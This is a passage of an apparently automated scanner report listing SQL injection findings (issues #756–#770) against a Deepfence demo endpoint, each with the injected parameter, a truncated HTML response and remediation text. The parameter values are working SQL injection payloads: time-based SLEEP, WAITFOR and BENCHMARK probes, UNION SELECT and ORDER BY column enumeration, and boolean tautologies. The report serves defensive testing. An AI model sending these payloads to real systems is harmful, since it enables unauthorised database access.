tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #756\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #757\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' OR 'x'='x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #758Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\"\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #759\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSLEEP(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #760\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #761\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSLEEP(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #762\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #763\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #764\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #765\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io );waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #766\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #767\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)--Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #768\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #769\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #770\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. 